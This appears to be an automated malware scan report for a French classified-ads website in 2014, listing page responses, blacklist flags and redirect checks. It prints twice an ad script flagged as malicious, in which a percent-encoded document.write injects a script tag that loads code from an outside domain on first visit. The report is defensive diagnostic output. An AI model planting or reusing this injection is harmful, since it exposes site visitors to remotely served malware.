Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=annonces-normandie.fr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://annonces-normandie.fr/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 09:51:29 GMT Location: http://www.annonces-normandie.fr/ Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.14 Content-Length: 378 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.annonces-normandie.fr/ | 200 OK Content-Length: 22749 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.annonces.paris-normandie.fr ...[1211 bytes skipped]... ta name="y_key" content="" /> <meta name="msvalidate.01" content="" /> <link rel="SHORTCUT ICON" href="http://www.annonces-normandie.fr/images/favicon.ico" type="image/x-icon" /> <link rel="alternate" type="application/rss+xml" title="S'abonner à annonces-normandie.fr" href="http://www.annonces-normandie.fr/index.php/pqractu/default/rss"> <link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/default_css.css" /> <link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/default_css_print.css" media="print" /> <link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/lightbox/highslide.css" /> <script type="text/javascript" src="http://www.annonces.paris-normandie.fr/js/default_js.js" ></script> <script type="text/javascript"> ...[2803 bytes skipped]... | ||
http://www.annonces.paris-normandie.fr/js/default_js.js | 200 OK Content-Length: 80104 Content-Type: application/x-javascript | suspicious |
Page code contains blacklisted domain: www.annonces-normandie.fr // fonction de popup centrée
function ouvrir(l,h,url) { hauteur=Math.round((screen.availHeight-h)/2); largeur=Math.round((screen.availWidth-l)/2); window.open(url, "site"+l+h, "toolbar=0,location=0,directories=0,status=0, scrollbars=yes,resizable=0,menubar=0,top="+hauteur+",left="+largeur+",width="+l+",height="+h); } // fonction de sélection d'objet function MM_findObj(n, d) { //v4.01 var p,i,x; if(!d) d=docu ...[4206 bytes skipped]... | ||
http://www.annonces.paris-normandie.fr/js/pqr_oas.js | 200 OK Content-Length: 1813 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890'; OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11); function OAS_NORMAL(pos) { document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>'); document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + else OAS_NORMAL(pos); } if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%6A%70%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));} Antivirus reports:
| ||
http://www.annonces.paris-normandie.fr/js/fonctions.js | 200 OK Content-Length: 5782 Content-Type: application/x-javascript | clean |
http://www.annonces.paris-normandie.fr/js/xiti.js | 200 OK Content-Length: 11791 Content-Type: application/x-javascript | clean |
http://annonces-normandie.fr/?Copix=3ae7d275cf23e0727f1505e97bc6f79e | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 09:51:31 GMT Location: http://www.annonces-normandie.fr/?Copix=3ae7d275cf23e0727f1505e97bc6f79e Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.14 Content-Length: 417 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.annonces-normandie.fr/?copix=3ae7d275cf23e0727f1505e97bc6f79e | 200 OK Content-Length: 22792 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.annonces.paris-normandie.fr ...[1211 bytes skipped]... ta name="y_key" content="" /> <meta name="msvalidate.01" content="" /> <link rel="SHORTCUT ICON" href="http://www.annonces-normandie.fr/images/favicon.ico" type="image/x-icon" /> <link rel="alternate" type="application/rss+xml" title="S'abonner à annonces-normandie.fr" href="http://www.annonces-normandie.fr/index.php/pqractu/default/rss"> <link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/default_css.css" /> <link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/default_css_print.css" media="print" /> <link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/lightbox/highslide.css" /> <script type="text/javascript" src="http://www.annonces.paris-normandie.fr/js/default_js.js" ></script> <script type="text/javascript"> ...[2803 bytes skipped]... | ||
http://www.annonces-normandie.fr/?Copix=458557ff8acfada2b289dea8526bc83b | 200 OK Content-Length: 22749 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.annonces.paris-normandie.fr ...[1211 bytes skipped]... ta name="y_key" content="" /> <meta name="msvalidate.01" content="" /> <link rel="SHORTCUT ICON" href="http://www.annonces-normandie.fr/images/favicon.ico" type="image/x-icon" /> <link rel="alternate" type="application/rss+xml" title="S'abonner à annonces-normandie.fr" href="http://www.annonces-normandie.fr/index.php/pqractu/default/rss"> <link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/default_css.css" /> <link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/default_css_print.css" media="print" /> <link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/lightbox/highslide.css" /> <script type="text/javascript" src="http://www.annonces.paris-normandie.fr/js/default_js.js" ></script> <script type="text/javascript"> ...[2803 bytes skipped]... | ||
http://www.annonces-normandie.fr/vitrines/liste-professionnels?selectedMenu=120 | 200 OK Content-Length: 26247 Content-Type: text/html | clean |
http://www.annonces-normandie.fr/js/default_js.js | 200 OK Content-Length: 80104 Content-Type: application/x-javascript | clean |
http://www.annonces-normandie.fr/js/pqr_oas.js | 200 OK Content-Length: 1813 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890'; OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11); function OAS_NORMAL(pos) { document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>'); document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + else OAS_NORMAL(pos); } if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%6A%70%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));} Antivirus reports:
| ||
http://www.annonces-normandie.fr/js/fonctions.js | 200 OK Content-Length: 5782 Content-Type: application/x-javascript | clean |
http://www.annonces-normandie.fr/js/xiti.js | 200 OK Content-Length: 11791 Content-Type: application/x-javascript | clean |
http://www.annonces-normandie.fr/vitrines/?Copix=b8513612a78f109ce08769b10389c665 | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Mon, 15 Sep 2014 09:51:34 GMT Pragma: no-cache Location: cms/6 Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.14 Content-Length: 0 Content-Type: text/html; charset=iso-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT X-Powered-By: PHP/5.2.14 | clean |
http://www.annonces-normandie.fr/vitrines/cms/6 | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Mon, 15 Sep 2014 09:51:34 GMT Pragma: no-cache Location: cms/6 Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.14 Content-Length: 0 Content-Type: text/html; charset=iso-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: Copix=3f20c29d9232fa870f1083f725a9dacb; path=/ X-Powered-By: PHP/5.2.14 | clean |
http://www.annonces-normandie.fr/vitrines/cms/cms/6 | 200 OK Content-Length: 1436 Content-Type: text/html | clean |
http://www.annonces-normandie.fr/vitrines/cms/cms/function.array-merge | 200 OK Content-Length: 1436 Content-Type: text/html | clean |
http://www.annonces-normandie.fr/vitrines/cms/cms/function.session-start | 200 OK Content-Length: 1436 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: annonces-normandie.fr
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 15 Sep 2014 09:51:29 GMT
Location: http://www.annonces-normandie.fr/
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.14
Content-Length: 378
Content-Type: text/html; charset=iso-8859-1
...378 bytes of data.
GET / HTTP/1.1
Host: annonces-normandie.fr
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 15 Sep 2014 09:51:29 GMT
Location: http://www.annonces-normandie.fr/
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.14
Content-Length: 378
Content-Type: text/html; charset=iso-8859-1
...378 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: annonces-normandie.fr
Referer: http://www.google.com/search?q=annonces-normandie.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: annonces-normandie.fr
Referer: http://www.google.com/search?q=annonces-normandie.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.